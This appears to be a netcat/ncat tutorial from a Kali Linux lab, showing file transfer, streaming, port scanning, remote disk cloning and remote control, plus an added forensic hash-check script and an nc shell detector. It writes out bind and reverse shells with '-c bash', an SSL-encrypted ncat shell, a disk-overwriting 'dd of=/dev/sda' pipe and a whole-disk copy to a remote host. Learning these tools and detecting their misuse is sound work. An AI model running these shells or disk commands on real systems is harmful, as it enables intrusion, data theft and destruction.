1. File transfer

Sender:
root@kali:~# touch 1.mp4  # ① create the video file to send
root@kali:~# nc -nv 10.0.0.52 333 < 1.mp4 -q 1  # ③ run the transfer; close the connection 1 s after it completes
(UNKNOWN) [10.0.0.52] 333 (?) open

Receiver:
[root@db2 ~]# nc -lp 333 > 3.mp4  # ② save the incoming video file as 3.mp4
[root@db2 ~]# ll  # ④ check that the transfer has finished
total 12
-rw-r--r-- 1 root root    0 Oct  4 23:12 3.mp4
-rw-r--r-- 1 root root 8569 Jun 28  2020 txt.txt


Sender:
root@kali:~# touch 2.mp4  # ① create the file
root@kali:~# nc -q 1 -lp 222 < 2.mp4  # ② offer the file to be sent and wait for a connection

Receiver:
[root@db2 ~]# nc -nv 10.0.0.146 222 > 5.mp4  # ③ receive the file and save it as 5.mp4
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.146:222.
^C  
[root@db2 ~]# 
[root@db2 ~]# ll  # ④ check
total 12
-rw-r--r-- 1 root root    0 Oct  4 23:12 3.mp4
-rw-r--r-- 1 root root    0 Oct  4 23:31 5.mp4
-rw-r--r-- 1 root root 8569 Jun 28  2020 txt.tx

2. Streaming media transfer

Sender:
cat game.MP4 |nc -lp 333  

Receiver:
apt-get update
apt-get install mplayer
nc -nv 10.0.0.52 333 |mplayer -vo x11 -cache 3000 -
root@kali:~# nc -nv 10.0.0.52 333 |mplayer -vo x11 -cache 3000 -
(UNKNOWN) [10.0.0.52] 333 (?) open
MPlayer 1.4 (Debian), built with gcc-10 (C) 2000-2019 MPlayer Team
do_connect: could not connect to socket
connect: No such file or directory
Failed to open LIRC support. You will not be able to use your remote control.

Playing -.
Reading from stdin...
Cache fill:  0.00% (0 bytes)   

libavformat version 58.76.100 (external)
libavformat file format detected.
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x7f2347b238e0]Protocol name not provided, cannot determine if input is local or a network protocol, buffers and access patterns cannot be configured optimally without knowing the protocol
Cannot seek backward in linear streams!
Seek failed
Cannot seek backward in linear streams!
Seek failed
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x7f2347b238e0]stream 0, offset 0x2c: partial file
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x7f2347b238e0]Could not find codec parameters for stream 1 (Video: h264 (avc1 / 0x31637661), none(tv, bt709), 1440x1920, 16281 kb/s): unspecified pixel format
Consider increasing the value for the 'analyzeduration' (0) and 'probesize' (5000000) options
[lavf] stream 0: audio (aac), -aid 0, -alang und
[lavf] stream 1: video (h264), -vid 0
VIDEO:  [H264]  1440x1920  24bpp  60.000 fps  16281.7 kbps (1987.5 kbyte/s)
vo: couldn't open the X11 display ()!
Error opening/initializing the selected video_out (-vo) device.
Clip info:
 major_brand: mp42
 minor_version: 1
 compatible_brands: isommp41mp42
 creation_time: 2021-08-08T08:21:37.000000Z
Load subtitles in ./
Cannot seek backward in linear streams!
Seek failed
Cannot seek backward in linear streams!
Seek failed
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x7f2347b238e0]stream 0, offset 0x2c: partial file
==========================================================================
Opening audio decoder: [ffmpeg] FFmpeg/libavcodec audio decoders
libavcodec version 58.134.100 (external)
Cannot seek backward in linear streams!
Seek failed
Cannot seek backward in linear streams!
Seek failed
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x7f2347b238e0]stream 0, offset 0x2c: partial file
AUDIO: 44100 Hz, 2 ch, floatle, 122.0 kbit/4.32% (ratio: 15256->352800)
Selected audio codec: [ffaac] afm: ffmpeg (FFmpeg AAC (MPEG-2/MPEG-4 Audio))
==========================================================================
AO: [pulse] 44100Hz 2ch floatle (4 bytes per sample)
Video: no video
Starting playback...
A:   0.0 (unknown) of 106.4 (01:46.3) ??,?% 0% 


Exiting... (End of file)

3. Port scanning

root@kali:~# nc -nvz 10.0.0.52 1-1000  # scan TCP ports 1-1000
(UNKNOWN) [10.0.0.52] 22 (ssh) open

root@kali:~# nc -nvzu 10.0.0.52 1-10  # scan UDP ports 1-10
(UNKNOWN) [10.0.0.52] 4 (?) open
(UNKNOWN) [10.0.0.52] 3 (?) open
(UNKNOWN) [10.0.0.52] 2 (?) open
(UNKNOWN) [10.0.0.52] 1 (?) open

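4. Remote disk cloning

For remote digital forensics, the target server's disk, or its memory, can be copied over the network.

Sectors, tracks and deleted content are all copied along with everything else. The disk is copied at block level, as a mirror image.

nc -lp 333 | dd of=/dev/sda  # the receiving host opens the listening port
dd if=/dev/sda | nc -nv 10.0.0.52 333 -q 1  # copy one disk of the host under examination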
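
For evidence handling, the copy is usually written to an image file and its hash compared with the source. The block below is an added example, not part of the original post: a local pipe stands in for the nc link, and the helper names (send_side, recv_side, verify_copy) and file names are assumptions.

```shell
#!/bin/sh
# Hash-verified copy over a pipe. With nc, the two halves would run as:
#   source:   send_side /dev/sda src.sha256 | nc -nv 10.0.0.52 333 -q 1
#   receiver: nc -lp 333 | recv_side evidence.img dst.sha256

# Stream SRC to stdout and record the SHA-256 of exactly the bytes sent.
send_side() {
    src=$1; src_hash=$2
    tmp=$(mktemp -d) || return 1
    mkfifo "$tmp/h" || return 1
    sha256sum < "$tmp/h" | cut -d' ' -f1 > "$src_hash" &
    dd if="$src" bs=64k 2>/dev/null | tee "$tmp/h"
    wait                      # let the hasher finish before returning
    rm -rf "$tmp"
}

# Write stdin to an image file (assumption: a file, not a live disk),
# then hash what actually landed on storage.
recv_side() {
    img=$1; dst_hash=$2
    dd of="$img" bs=64k 2>/dev/null
    sha256sum "$img" | cut -d' ' -f1 > "$dst_hash"
}

# Succeed only if both sides recorded the same non-empty digest.
verify_copy() {
    [ -s "$1" ] && [ -s "$2" ] && [ "$(cat "$1")" = "$(cat "$2")" ]
}

# Constructed demo: a 1 MiB random file plays the role of the disk.
demo() {
    work=$(mktemp -d) || return 1
    dd if=/dev/urandom of="$work/disk.bin" bs=1024 count=1024 2>/dev/null
    send_side "$work/disk.bin" "$work/src.sha256" |
        recv_side "$work/evidence.img" "$work/dst.sha256"
    verify_copy "$work/src.sha256" "$work/dst.sha256" &&
        cmp -s "$work/disk.bin" "$work/evidence.img"
    rc=$?
    rm -rf "$work"
    return $rc
}

demo && echo "image verified: digests match"
```

The source-side digest is taken from the stream itself, so it describes the bytes that were sent even if the disk changes afterwards.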

5. Remote control

Controlled side:
root@kali:~# nc -lp 333 -c bash

Controlling side:
[root@db2 ~]# nc -nv 10.0.0.146 333
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.146:333.



Controlling side:
root@kali:~# nc -lp 333 
ls
txt.txt

Controlled side:
[root@db2 ~]# nc -nv 10.0.0.146 333 -c bash
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.146:333.

Whether it is acting as the server or the client, the side that runs with "-c bash" is the controlled side.
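
The same rule is useful for detection. The block below is an added example, not part of the original post: it flags nc/ncat command lines that attach a program to the socket (-c/-e, or ncat's --sh-exec/--exec). The function names and the sample process listing are constructed.

```shell
#!/bin/sh
# Flag nc/ncat/netcat processes started with a program attached to the socket.
# Input on stdin: "PID COMMAND ARGS..." per line, e.g. from `ps -eo pid,args`.
# Heuristic only: a hit is a lead to review, not proof of compromise.
flag_nc_exec() {
    awk '
    {
        n = split($2, path, "/"); exe = path[n]      # basename of argv[0]
        if (exe != "nc" && exe != "ncat" && exe != "netcat") next
        hit = ""
        for (i = 3; i <= NF; i++) {
            # long options --exec/--sh-exec, or a short option cluster
            # containing c or e (for example -c, -e, -lvpe)
            if ($i ~ /^--(sh-)?exec(=|$)/ || $i ~ /^-[A-Za-z0-9]*[ce]/) {
                hit = $i
                break
            }
        }
        if (hit != "") print $1, exe, hit
    }'
}

# Constructed process listing; PIDs and the /usr/bin path are made up.
sample_ps() {
    cat <<'EOF'
  101 nc -lp 333 -c bash
  102 nc -nv 10.0.0.146 333
  103 /usr/bin/ncat -c bash --allow 10.0.0.52 -vnl 333 --ssl
  104 nc -nvz 10.0.0.52 1-1000
  105 mplayer -vo x11 -cache 3000 -
  106 ncat --sh-exec bash -l 333
EOF
}

sample_ps | flag_nc_exec
```

On a live host, feed it `ps -eo pid,args`; the plain client, the port scan and the mplayer process in the sample are not reported.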

6. Encrypted remote control: ncat

Controlled side:
root@kali:~# ncat ncat -c bash --allow 10.0.0.52 -vnl 333 --ssl
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Could not resolve hostname "ncat": Name or service not known. QUITTING.
root@kali:~#  ncat -c bash --allow 10.0.0.52 -vnl 333 --ssl
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: A57B B768 00EA 4919 0956 BAE1 EACA A3CF C5C9 F80B
Ncat: Listening on :::333
Ncat: Listening on 0.0.0.0:333
Ncat: Connection from 10.0.0.52.
Ncat: Connection from 10.0.0.52:42190.

Controlling side:
[root@db2 ~]# ncat -nv 10.0.0.146 333 --ssl
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Subject: CN=localhost
Ncat: Issuer: CN=localhost
Ncat: SHA-1 fingerprint: A57B B768 00EA 4919 0956 BAE1 EACA A3CF C5C9 F80B
Ncat: Certificate verification failed (self signed certificate).
Ncat: SSL connection to 10.0.0.146:333.
Ncat: SHA-1 fingerprint: A57B B768 00EA 4919 0956 BAE1 EACA A3CF C5C9 F80B
ls
07.txt
1.txt
2.sh
3.mp4
3.sh
49.txt
4.sh
公共
模板
视频
图片
文档
下载
音乐
桌面
Public
